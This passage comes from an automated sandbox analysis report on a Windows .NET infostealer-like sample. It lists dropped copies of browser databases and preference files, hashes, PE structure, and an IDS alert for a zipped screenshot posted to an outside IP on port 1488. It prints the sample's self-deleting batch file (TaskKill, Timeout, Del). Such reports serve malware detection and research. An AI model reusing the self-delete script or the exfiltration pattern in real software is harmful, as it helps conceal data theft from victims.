Preview:	{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"b

C:\Users\user\AppData\Local\Temp\tmp793B.tmp.dat

Download File

Process:	C:\Users\user\Desktop\VaXmr82RIb.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3036000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08231524779339361
Encrypted:	false
SSDEEP:	12:DQANJfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQANJff32mNVpP965Ra8KN0MG/lO
MD5:	886A5F9308577FDF19279AA582D0024D
SHA1:	CDCCC11837CDDB657EB0EF6A01202451ECDF4992
SHA-256:	BA7EB45B7E9B6990BC63BE63836B74FA2CCB64DCD0C199056B6AE37B1AE735F2
SHA-512:	FF0692E52368708B36C161A4BFA91EE01CCA1B86F66666F7FC4979C6792D598FF7720A9FAF258F61439DAD61DB55C50D992E99769B1E4D321EC5B98230684BC5
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................S`.....}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp793C.tmp.tmpdb

Download File

Process:	C:\Users\user\Desktop\VaXmr82RIb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	0.08434615749937499
Encrypted:	false
SSDEEP:	192:2va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vPY:21zkVmvQhyn+Zoz67R
MD5:	93BAA1B7500F3ADB16BE27FCB2E256A8
SHA1:	77CB640557F5F7950B083405B4AEE0573D11D98F
SHA-256:	7C24FE957EFB0DDF026ECDD88027BE5B40863342CF2CF2A5A7FF72062F75B1E9
SHA-512:	C53D09227E5069924E49823CD6E93775B98439D57D279BEEFFE14EA057BF9D9882CE1BC297C0181D0309E027E7993F079D6BF4933A929D2C942903D28DB155AB
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................S`.....z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp795D.tmp.dat

Download File

Process:	C:\Users\user\Desktop\VaXmr82RIb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	122880
Entropy (8bit):	1.1414673161713362
Encrypted:	false
SSDEEP:	192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
MD5:	24937DB267D854F3EF5453E2E54EA21B
SHA1:	F519A77A669D9F706D5D537A203B7245368D40CE
SHA-256:	369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
SHA-512:	AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
Malicious:	false
Preview:	SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp795E.tmp.dat

Download File

Process:	C:\Users\user\Desktop\VaXmr82RIb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 3, database pages 27, 1st free page 7, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	57344
Entropy (8bit):	0.7310370201569906
Encrypted:	false
SSDEEP:	96:qsvKLyeymO9K3PlGNxotxPUCbn8MouON3n:q86PlGNxss27e
MD5:	A802F475CA2D00B16F45FEA728F2247C
SHA1:	AF57C02DA108CFA0D7323252126CC87D7B608786
SHA-256:	156ADDC0B949718CF518720E5774557B134CCF769A15E0413ABC257C80E58684
SHA-512:	275704B399A1C236C730F4702B57320BD7F034DC234B7A820452F8C650334233BD6830798446664F133BA4C77AA2F91E66E901CE8A11BD8575C2CD08AB9BE98F
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................S`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp795F.tmp.dat

Download File

Process:	C:\Users\user\Desktop\VaXmr82RIb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	122880
Entropy (8bit):	1.1414673161713362
Encrypted:	false
SSDEEP:	192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
MD5:	24937DB267D854F3EF5453E2E54EA21B
SHA1:	F519A77A669D9F706D5D537A203B7245368D40CE
SHA-256:	369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
SHA-512:	AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
Malicious:	false
Preview:	SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7960.tmp.dat

Download File

Process:	C:\Users\user\Desktop\VaXmr82RIb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	122880
Entropy (8bit):	1.1414673161713362
Encrypted:	false
SSDEEP:	192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
MD5:	24937DB267D854F3EF5453E2E54EA21B
SHA1:	F519A77A669D9F706D5D537A203B7245368D40CE
SHA-256:	369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
SHA-512:	AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
Malicious:	false
Preview:	SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7980.tmp.dat

Download File

Process:	C:\Users\user\Desktop\VaXmr82RIb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 4, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.86528072116055
Encrypted:	false
SSDEEP:	96:kTN7KLWlGxdKmtZeympbn8MouB6w9f/rrGMa:qVlGxdKN7Iw9fj
MD5:	8CC409C8658C3F05143C1484A1719879
SHA1:	909CDE14664C0E5F943764895E0A9DFEC7831FF5
SHA-256:	BC69C3518DA2ABC8904F314F078D9672BAF3B840E09FD2B2E95D4B07A03A85A4
SHA-512:	55D8923B6481ADF442817B7BAA50C36CBAD8DAC0EC600451813D29F4775DE519A06158A6233E61635CD0ED862E60AC7F50C75556C4E89D583D8A8A4299F1808F
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................v.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7981.tmp.dat

Download File

Process:	C:\Users\user\Desktop\VaXmr82RIb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 14, database pages 65, cookie 0x57, schema 4, UTF-8, version-valid-for 14
Category:	dropped
Size (bytes):	135168
Entropy (8bit):	1.0873605234887023
Encrypted:	false
SSDEEP:	192:yD1DgPn0BkoOQuA5bUWDX6+7VuP7Ewvjd:A1cPn0BktQuubrt7VuP7Ewrd
MD5:	5B01CD9FA62FDF35D1A4587F2676CA31
SHA1:	25BBFAC890114F4ECE0BF818F504FFE6102004B8
SHA-256:	74D3D72E8CEB233D400747C902F3331B3824902C81B6EF8AA3D7AC85A7A3F095
SHA-512:	A565038CDF3C69621F31D8DE4558F74375AADF1DC881C2C82A877C105437F7F9B1D97D1652E98566984EFCA8F1C39224B40B450C742610395A265D81362254DC
Malicious:	false
Preview:	SQLite format 3......@ .......A...........W......................................................v............A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7982.tmp.dat

Download File

Process:	C:\Users\user\Desktop\VaXmr82RIb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 14, database pages 65, cookie 0x57, schema 4, UTF-8, version-valid-for 14
Category:	dropped
Size (bytes):	135168
Entropy (8bit):	1.0873605234887023
Encrypted:	false
SSDEEP:	192:yD1DgPn0BkoOQuA5bUWDX6+7VuP7Ewvjd:A1cPn0BktQuubrt7VuP7Ewrd
MD5:	5B01CD9FA62FDF35D1A4587F2676CA31
SHA1:	25BBFAC890114F4ECE0BF818F504FFE6102004B8
SHA-256:	74D3D72E8CEB233D400747C902F3331B3824902C81B6EF8AA3D7AC85A7A3F095
SHA-512:	A565038CDF3C69621F31D8DE4558F74375AADF1DC881C2C82A877C105437F7F9B1D97D1652E98566984EFCA8F1C39224B40B450C742610395A265D81362254DC
Malicious:	false
Preview:	SQLite format 3......@ .......A...........W......................................................v............A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7983.tmp.dat

Download File

Process:	C:\Users\user\Desktop\VaXmr82RIb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 14, database pages 65, cookie 0x57, schema 4, UTF-8, version-valid-for 14
Category:	dropped
Size (bytes):	135168
Entropy (8bit):	1.0873605234887023
Encrypted:	false
SSDEEP:	192:yD1DgPn0BkoOQuA5bUWDX6+7VuP7Ewvjd:A1cPn0BktQuubrt7VuP7Ewrd
MD5:	5B01CD9FA62FDF35D1A4587F2676CA31
SHA1:	25BBFAC890114F4ECE0BF818F504FFE6102004B8
SHA-256:	74D3D72E8CEB233D400747C902F3331B3824902C81B6EF8AA3D7AC85A7A3F095
SHA-512:	A565038CDF3C69621F31D8DE4558F74375AADF1DC881C2C82A877C105437F7F9B1D97D1652E98566984EFCA8F1C39224B40B450C742610395A265D81362254DC
Malicious:	false
Preview:	SQLite format 3......@ .......A...........W......................................................v............A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7984.tmp.dat

Download File

Process:	C:\Users\user\Desktop\VaXmr82RIb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3045002, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.4026573159402624
Encrypted:	false
SSDEEP:	48:TB9aw/aHLopFMavU1/iB8eVC+rQ88TkQqp8JHyDlEKw0esEieNp:1PareMa8K8eVC+rZ8TkQqpWSDlNufp
MD5:	F49DFF163167A43F4940B7337A092C07
SHA1:	1A8BAAC92537FA0BD39063D17C3072AD86190CC4
SHA-256:	B3D38278030DBEA9D1CDDC177F9B6CB590CE1D383A88211B231402B7CA208CF3
SHA-512:	BC7685763D70300FE2AE28803D9F886D91004F6045A995065FAAEB6A9DFCAB77E80B475516E9B4C1F8969E112E2B48C7E68FC2AB15F61BB69443A8C54E24066F
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................v.......@..g.....@....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpF01E.tmp.bat

Download File

Process:	C:\Users\user\Desktop\VaXmr82RIb.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	107
Entropy (8bit):	5.190724786127888
Encrypted:	false
SSDEEP:	3:HFTEOuMJcFKsokMlwBRZDEXEPONy+Wzbnnvn:yOuMJN/lweonRnvn
MD5:	C79B119F0EEF08776E4A857C87CECA82
SHA1:	3D546F58AC78F26D4896767525A46F5A0DFC7F7E
SHA-256:	13EB3FEE3292E5EAD718A9EFDE4D91A72037B6A2788CEC423AF691B0E765FEF7
SHA-512:	433845FD6AED1756AD9B74972C7F5D02FD48388FECCDE18CCF61BCFCF41D9484828CB593DB4394DE594DC381EB54014AF5E5D93C1048745BECD268A52772211A
Malicious:	false
Preview:	chcp 65001..TaskKill /F /IM 3364..Timeout /T 2 /Nobreak..Del /ah "C:\Users\user\Desktop\VaXmr82RIb.exe"..

C:\Users\user\AppData\Local\Temp\zc4g3vos.e4p

Download File

Process:	C:\Users\user\Desktop\VaXmr82RIb.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	103985
Entropy (8bit):	6.082865991437579
Encrypted:	false
SSDEEP:	1536:QJFxqXOHF+7gFajcCN5tTsxDxEM0pMtwGUFJ526GH1B1WAUt6+1NJsf:QxwOl+V95+xDxLqMtwGU2B1s6+/K
MD5:	6DE273C47E7F54F2910BC516F886633B
SHA1:	230A6D3F3510D1231BCDAD4F4BD843F1575A84A5
SHA-256:	89545282AD73EE9D530E4BACEE9A2046322C767CB7564E8E12694F30CF8CDDEF
SHA-512:	AB5488E0C9622FCC6F4610B0501E79EA87C1963480E8E9F217B46F94E7DDFD32FE0BED9D1329093C58F2D330A49E2D8468CDFD4C6CC8689590671B36F9504617
Malicious:	false
Preview:	{"accessibility":{"screen_ai":{"last_used_time":"13370432463378508"}},"autofill":{"ablation_seed":"f4fbGGU/iY4=","states_data_dir":"C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\AutofillStates\\2020.11.2.164946"},"background_tracing":{"session_state":{"privacy_filter":true,"state":0}},"breadcrumbs":{"enabled":false,"enabled_time":"13369750774825357"},"browser":{"default_browser_infobar_declined_count":1,"default_browser_infobar_last_declined_time":"13370432455860460","default_browser_prompt_refresh_study_group":"enabled-v2-arm-3","last_redirect_origin":"","last_whats_new_version":128,"shortcut_migration_version":"92.0.4515.159","whats_new_hats_activation_threshold":64},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"local":{"password_hash_data_list":[]},"management":{"platform"

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.7259797125044
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.98% Win32 Executable (generic) a (10002005/4) 49.93% Windows Screen Saver (13104/52) 0.07% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01%
File name:	VaXmr82RIb.exe
File size:	816'640 bytes
MD5:	3e11e285b883807eb038196ea1de3cf8
SHA1:	b7346061f7e70ecabf1831fe964e4d0080b31ea9
SHA256:	1003ed3cc55ba1b802f8c831b6f29dc304b163c58c222f884a22ce338fdf75c0
SHA512:	9a7a0165b0879f86a2f34ad520d71fd9ad9fbfa0bf082e3cab4933cd110b4ebcf3f52a4187111d610dc990d9f9925e4cf20e778fa312eeae0f94d4b904f907e3
SSDEEP:	12288:tedxZHQOCIdXI6QsZ5bzxniR95bh/wYyT9df5+LHCpFHdfcD4aPC4m+zux9v1SJG:8XpdXIJsZbMHdcbILHCp1Fm4C1mNvuO
TLSH:	0505010AAFDC4F66CA891339943603514AF297D5F58BF3C63719B5F836077A0D8123AA
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....-..........."...0..............*... ........@.. ....................................`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4b2a01
Entrypoint Section:	.4j;
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xF12D1FC7 [Fri Mar 21 18:51:51 2098 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [004AC000h]
scasb
xchg eax, edi
mov esi, 3A4E660Ah
mov al, C7h
adc eax, 167A471Ah
cmc
mov dl, 01h
jmp 00007F17879AD207h
out 93h, al
ror bh, cl
imul eax, dword ptr [ebp-2Eh], 73h
mov ch, bh
jmp 00007F17F08F637Ch
add byte ptr [ebp+ecx*4-7DF4E0A4h], dh
jl 00007F17F08F636Bh
call far fword ptr [AF1F1CEDh]
pop ss
jmp 00007F180E837527h
in eax, dx
pop ds
ret
jp 00007F17F08F640Ch
dec edx
pop es

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb6550	0x28	.4j;
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x174000	0x150c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x176000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x14d940	0x38	.4j;
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xac000	0x8	.#x#
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x14d980	0x48	.4j;
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x29668	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.<':	0x2c000	0x7e9fb	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.#x#	0xac000	0x8	0x200	4f2638cb3b6a24a282cbbeca87b56073	False	0.03125	data	0.06116285224115448	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.4j;	0xae000	0xc57e4	0xc5800	24fb1d714a4d8fc0e6492436db4ec171	False	0.8477489616297469	data	7.738212847633549	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x174000	0x150c	0x1600	4aca51f7947e6d4e11e521346919a785	False	0.3913352272727273	data	5.415068697758594	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x176000	0xc	0x200	dc014d2388db9a92e9c7b59c63685ea4	False	0.048828125	data	0.12227588125913882	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x174090	0x340	data			0.45072115384615385
RT_MANIFEST	0x1743e0	0x1126	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.40387243735763095

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-04T14:44:39.658760+0100	2843856	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2	1	192.168.11.20	49747	89.23.100.233	1488	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 4, 2024 14:44:32.482964039 CET	49746	80	192.168.11.20	104.16.184.241
Dec 4, 2024 14:44:32.609236002 CET	80	49746	104.16.184.241	192.168.11.20
Dec 4, 2024 14:44:32.610553980 CET	49746	80	192.168.11.20	104.16.184.241
Dec 4, 2024 14:44:32.610554934 CET	49746	80	192.168.11.20	104.16.184.241
Dec 4, 2024 14:44:32.736851931 CET	80	49746	104.16.184.241	192.168.11.20
Dec 4, 2024 14:44:32.748589993 CET	80	49746	104.16.184.241	192.168.11.20
Dec 4, 2024 14:44:32.799587011 CET	49746	80	192.168.11.20	104.16.184.241
Dec 4, 2024 14:44:38.597053051 CET	49747	1488	192.168.11.20	89.23.100.233
Dec 4, 2024 14:44:38.859251976 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:38.859435081 CET	49747	1488	192.168.11.20	89.23.100.233
Dec 4, 2024 14:44:38.861116886 CET	49747	1488	192.168.11.20	89.23.100.233
Dec 4, 2024 14:44:38.862515926 CET	49746	80	192.168.11.20	104.16.184.241
Dec 4, 2024 14:44:38.989793062 CET	80	49746	104.16.184.241	192.168.11.20
Dec 4, 2024 14:44:38.990005970 CET	49746	80	192.168.11.20	104.16.184.241
Dec 4, 2024 14:44:39.129076004 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:39.131422997 CET	49747	1488	192.168.11.20	89.23.100.233
Dec 4, 2024 14:44:39.132627010 CET	49747	1488	192.168.11.20	89.23.100.233
Dec 4, 2024 14:44:39.132677078 CET	49747	1488	192.168.11.20	89.23.100.233
Dec 4, 2024 14:44:39.132755041 CET	49747	1488	192.168.11.20	89.23.100.233
Dec 4, 2024 14:44:39.132916927 CET	49747	1488	192.168.11.20	89.23.100.233
Dec 4, 2024 14:44:39.393357992 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:39.394532919 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:39.394732952 CET	49747	1488	192.168.11.20	89.23.100.233
Dec 4, 2024 14:44:39.394891024 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:39.394918919 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:39.395100117 CET	49747	1488	192.168.11.20	89.23.100.233
Dec 4, 2024 14:44:39.395184994 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:39.395210028 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:39.395226955 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:39.395267010 CET	49747	1488	192.168.11.20	89.23.100.233
Dec 4, 2024 14:44:39.395631075 CET	49747	1488	192.168.11.20	89.23.100.233
Dec 4, 2024 14:44:39.395782948 CET	49747	1488	192.168.11.20	89.23.100.233
Dec 4, 2024 14:44:39.656881094 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:39.657058954 CET	49747	1488	192.168.11.20	89.23.100.233
Dec 4, 2024 14:44:39.657227039 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:39.657227993 CET	49747	1488	192.168.11.20	89.23.100.233
Dec 4, 2024 14:44:39.657392025 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:39.657398939 CET	49747	1488	192.168.11.20	89.23.100.233
Dec 4, 2024 14:44:39.657573938 CET	49747	1488	192.168.11.20	89.23.100.233
Dec 4, 2024 14:44:39.657738924 CET	49747	1488	192.168.11.20	89.23.100.233
Dec 4, 2024 14:44:39.657896996 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:39.657902956 CET	49747	1488	192.168.11.20	89.23.100.233
Dec 4, 2024 14:44:39.657927990 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:39.658078909 CET	49747	1488	192.168.11.20	89.23.100.233
Dec 4, 2024 14:44:39.658154964 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:39.658230066 CET	49747	1488	192.168.11.20	89.23.100.233
Dec 4, 2024 14:44:39.658416986 CET	49747	1488	192.168.11.20	89.23.100.233
Dec 4, 2024 14:44:39.658462048 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:39.658760071 CET	49747	1488	192.168.11.20	89.23.100.233
Dec 4, 2024 14:44:39.658930063 CET	49747	1488	192.168.11.20	89.23.100.233
Dec 4, 2024 14:44:39.919455051 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:39.919727087 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:39.919728994 CET	49747	1488	192.168.11.20	89.23.100.233
Dec 4, 2024 14:44:39.919903994 CET	49747	1488	192.168.11.20	89.23.100.233
Dec 4, 2024 14:44:39.919970989 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:39.920066118 CET	49747	1488	192.168.11.20	89.23.100.233
Dec 4, 2024 14:44:39.920233965 CET	49747	1488	192.168.11.20	89.23.100.233
Dec 4, 2024 14:44:39.920408010 CET	49747	1488	192.168.11.20	89.23.100.233
Dec 4, 2024 14:44:39.921916008 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:39.921947002 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:39.921967983 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:39.921988010 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:39.922008038 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:39.922030926 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:39.922071934 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:39.922087908 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:39.922102928 CET	49747	1488	192.168.11.20	89.23.100.233
Dec 4, 2024 14:44:39.922287941 CET	49747	1488	192.168.11.20	89.23.100.233
Dec 4, 2024 14:44:40.181874990 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:40.182082891 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:40.182394028 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:40.182403088 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:40.182440996 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:40.182447910 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:40.182735920 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:40.182775974 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:40.182784081 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:40.183032990 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:40.184338093 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:40.184346914 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:40.184556961 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:40.184566975 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:40.184848070 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:40.184856892 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:40.184863091 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:40.184870005 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:41.560194016 CET	1488	49747	89.23.100.233	192.168.11.20
